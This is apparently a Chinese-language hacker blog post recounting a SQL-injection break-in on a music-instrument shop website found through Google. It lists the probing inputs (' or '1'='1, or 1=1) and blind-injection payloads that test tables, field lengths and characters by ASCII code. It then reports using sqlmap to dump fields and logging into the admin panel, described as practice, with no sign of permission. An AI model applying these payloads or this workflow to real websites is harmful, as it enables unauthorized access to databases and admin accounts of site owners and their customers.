●漏洞已提交
■重要細節全部打碼
■部分細節對外開放
■本次入侵不對網站數據庫進行任何更改
注:日常挖洞系列基本上是記錄平常遇到的非常普通的漏洞,毫無看點,僅僅記錄挖洞的經驗
日常記錄漏洞站點
google上找到一個琴行網站
判斷sql注入
注入單引號’
報錯"商品已下架"
網站後加上’ or ‘1’='1
報錯"商品已下架",並且不爆出具體錯誤
繼續更改
or 1=1
網頁正常返回並爆出該表下所有數據,看樣子是int型
●判斷:存在sql注入點
開始注入
因爲不返回具體信息,所以having 1=1的方法就報廢了
所以盲注檢測數據庫
and exists(select * from 表名)
這個方法判斷當前數據庫下是否有此表
and (select count(字段) from 表名)
判斷此表名下是否有某字段
and (select top 1 len (字段) from 表名)>數字
判斷該列的字段長度是否大於某個數
and (select top 1 asc (mid (字段,位數,1)) from 表名) >ascii(1~128)
判斷字段的ascii碼
比如and (select top 1 asc (mid (字段,位數,1)) from 表名) >96
如果返回正常,而97返回不正常那麼該字段的某位數的ascii碼爲97,查詢ascii碼錶,此字爲a
接着一個個猜就行,不過我可沒這耐心,我直接用sqlmap跑出字段了
成功登入網站管理界面
此處入侵沒有什麼技術含量,純粹練練手感